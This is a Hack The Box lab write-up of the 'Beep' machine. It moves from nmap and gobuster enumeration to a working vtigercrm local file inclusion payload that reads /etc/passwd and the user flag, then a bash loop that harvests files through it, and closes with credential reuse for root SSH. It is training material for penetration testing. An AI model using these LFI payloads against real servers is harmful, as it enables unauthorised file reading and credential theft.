Cybersecurity
Software

Beep

Enumeration

Let's start out by enumerating the box and finding out what we are dealing with.
1# Nmap 7.92 scan initiated Mon Jan  3 16:51:21 2022 as: nmap -sC -sV -oA nmap/scan -v 10.10.10.7
2Nmap scan report for 10.10.10.7
3Host is up (0.021s latency).
4Not shown: 988 closed tcp ports (conn-refused)
5PORT      STATE SERVICE    VERSION
622/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
7| ssh-hostkey: 
8|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
9|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
1025/tcp    open  smtp       Postfix smtpd
11|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
1280/tcp    open  http       Apache httpd 2.2.3
13|_http-server-header: Apache/2.2.3 (CentOS)
14| http-methods: 
15|_  Supported Methods: GET HEAD POST OPTIONS
16|_http-title: Did not follow redirect to https://10.10.10.7/
17110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
18|_pop3-capabilities: UIDL AUTH-RESP-CODE TOP USER IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) APOP STLS EXPIRE(NEVER) PIPELINING
19111/tcp   open  rpcbind    2 (RPC #100000)
20| rpcinfo: 
21|   program version    port/proto  service
22|   100000  2            111/tcp   rpcbind
23|   100000  2            111/udp   rpcbind
24|   100024  1            875/udp   status
25|_  100024  1            878/tcp   status
26143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
27|_imap-capabilities: Completed STARTTLS OK ATOMIC URLAUTHA0001 LITERAL+ MAILBOX-REFERRALS THREAD=REFERENCES RENAME LIST-SUBSCRIBED SORT LISTEXT MULTIAPPEND ID NO X-NETSCAPE THREAD=ORDEREDSUBJECT ANNOTATEMORE UIDPLUS UNSELECT CHILDREN IMAP4rev1 CATENATE SORT=MODSEQ IDLE RIGHTS=kxte BINARY ACL IMAP4 NAMESPACE QUOTA CONDSTORE
28443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
29|_ssl-date: 2022-01-03T06:55:55+00:00; +1h01m05s from scanner time.
30|_http-server-header: Apache/2.2.3 (CentOS)
31| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
32| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
33| Public Key type: rsa
34| Public Key bits: 1024
35| Signature Algorithm: sha1WithRSAEncryption
36| Not valid before: 2017-04-07T08:22:08
37| Not valid after:  2018-04-07T08:22:08
38| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
39|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
40| http-methods: 
41|_  Supported Methods: GET HEAD POST OPTIONS
42|_http-title: Elastix - Login page
43| http-robots.txt: 1 disallowed entry 
44|_/
45|_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F
46993/tcp   open  ssl/imap   Cyrus imapd
47|_imap-capabilities: CAPABILITY
48995/tcp   open  pop3       Cyrus pop3d
493306/tcp  open  mysql      MySQL (unauthorized)
50|_tls-alpn: ERROR: Script execution failed (use -d to debug)
51|_ssl-cert: ERROR: Script execution failed (use -d to debug)
52|_sslv2: ERROR: Script execution failed (use -d to debug)
53|_ssl-date: ERROR: Script execution failed (use -d to debug)
54|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
554445/tcp  open  upnotifyp?
5610000/tcp open  http       MiniServ 1.570 (Webmin httpd)
57| http-methods: 
58|_  Supported Methods: GET HEAD POST OPTIONS
59|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
60|_http-server-header: MiniServ/1.570
61|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
62Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com
63
64Host script results:
65|_clock-skew: 1h01m04s
66
67Read data files from: /usr/bin/../share/nmap
68Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
69# Nmap done at Mon Jan  3 16:57:54 2022 -- 1 IP address (1 host up) scanned in 393.30 seconds
Look to have quite a few ports open. Starting with http on port 80, we get redirected to the https on port 443 and are presented with a login screen. Default credentials like admin:admin and admin:password won't work so instead I move onto a gobuster scan to try and increase the attack surface.
1bash
2gobuster dir -t 100 -u https://10.10.10.7 -x php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt -k -o gobuster
Gobuster Produced the following output:
1bash
2┌──(tom㉿acer-computer)-[~/htb/beep]
3└─$ cat 10.10.10.7-gobuster 
4/.html                (Status: 403) [Size: 283]
5/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
6/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
7/.htm                 (Status: 403) [Size: 282]
8/.html.php            (Status: 403) [Size: 287]
9/.htm.php             (Status: 403) [Size: 286]
10/index.php            (Status: 200) [Size: 1785]
11/config.php           (Status: 200) [Size: 1785]
12/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
13/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
14/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
15/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
16/libs                 (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
17/.                    (Status: 200) [Size: 1785]
18/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
19/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
20/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
21/.htaccess            (Status: 403) [Size: 287]
22/register.php         (Status: 200) [Size: 1785]
23/.htaccess.php        (Status: 403) [Size: 291]
24/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
25/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
26/.htc                 (Status: 403) [Size: 282]
27/.htc.php             (Status: 403) [Size: 286]
28/.html_var_DE         (Status: 403) [Size: 290]
29/.html_var_DE.php     (Status: 403) [Size: 294]
30/.htpasswd            (Status: 403) [Size: 287]
31/.htpasswd.php        (Status: 403) [Size: 291]
32/.html..php           (Status: 403) [Size: 288]
33/.html.               (Status: 403) [Size: 284]
34/.html.html.php       (Status: 403) [Size: 292]
35/.html.html           (Status: 403) [Size: 288]
36/recordings           (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
37/.htpasswds           (Status: 403) [Size: 288]
38/.htpasswds.php       (Status: 403) [Size: 292]
39/.htm.                (Status: 403) [Size: 283]
40/.htm..php            (Status: 403) [Size: 287]
41/vtigercrm            (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
42<SNIP..>
Gobuster identifies a
/admin
directory and navigating to this directory i get presented with an authentication prompt.
Default credentials again do not work, might try brute forcing later if I dont have success anywhere else. Hitting cancel directs us to
/admin/config.php
and says that we are unauthorised which makes me think we have some information disclosure on this page.
Clicking on the recording tab takes us to yet another page
This page says we are using FreePBX version 2.5 which is different to the last page which said we were using v2.8.1.4. Using gobuster on this page shows that a directory
/modules
exists and navigating to this shows several files containing php code.
Going back to the nmap scan and notice another http service listening on port 10000. Navigating to this page we are presented with yet another login page. After attempting to login with default credentials, I get an error message saying that my IP has been blocked due to too many authentication failures.

Exploitation

With a lot of things to enumerate, I start with googling around for exploits for freepbx 2.8.1.4 as I don't have a version number for elastix running on port 443. I find a metasploit module and running this against the server does not result in a shell and gives a metasploit error saying exploit completed but no shell was created. So back to enumeration.

More enumeration

After reviewing the gobuster scan, the result
/vtigercrm
peaks my interest. Navigating to this page shows yet another login page.
I notice the version the software and version number in the bottom left and throw that into google. I find this exploit on exploit db, which is a local file inclusion exploit, which works!!
1┌──(tom㉿acer-computer)-[~/htb/beep]
2└─$ curl "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00" -k
3root:x:0:0:root:/root:/bin/bash
4<SNIP...>
5mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
6<SNIP..>
7cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
8<SNIP...>
9asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
10<SNIP..>
11spamfilter:x:500:500::/home/spamfilter:/bin/bash
12<SNIP..>
13fanis:x:501:501::/home/fanis:/bin/bash
From this we can identify the users spamfilter and fanis

Exploitation again

I attempted to use php filters to leak the website source code however I was unsuccessful. The only thing I was able to get was the user flag by doing
sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
however I feel this is sort of cheating as I am not actually the user yet. I create the following bash script in order to retrieve useful files from the server.
1#!/bin/bash
2
3for i in $(cat /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt)
4do
5        contents=$(curl "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../.."$i"%00" -k)
6
7        if [ $(echo $contents | wc -c) != 0 ]
8        then
9                echo $contents > $(echo $i| tr '/' '_').txt
10        fi
11done
Config files for website must be stored in a non standard location as i did not get any config files. At this point I refer to another walkthrough for a hint on where to go next
Hint - Elastix exploit
/help
Looking at searchsploit results both the LFI and RCE exploits which look interesting. I start with the LFI as I had success with that before. The LFI example brings upa config page with users and passwords in it. I now have credentials for the asterisk user and admin. The password works and gets me into the admin portal.
I try to ssh into the machine as the asterisk user, no success. I try as root and am successful, allowing me to grab the root flag.

Review / Take aways

After doing some research on the box, it turns out there are multiple ways of exploiting it. Its useful to always look for help documents on the machine, as they can tell you version numbers or dates. The reason the php filters did not work was due to the position of the variable in the url in the backend.
e.g.
1
2@include("include/language/$language.lang.php");
When I get stuck, I should always go back a step in my enumeration process and see if there was a result I missed or a result I was going to review but forgot.
Even though language was never sanitised, because it comes after
include/language
, adding a php filter would make it look like
include/language/php://......
and would not show anything. If instead of "include" it was "get_file_contents" it would get the contents of the file and not execute any code.
I should have also checked the server for any ssh keys as that could have been an easy win.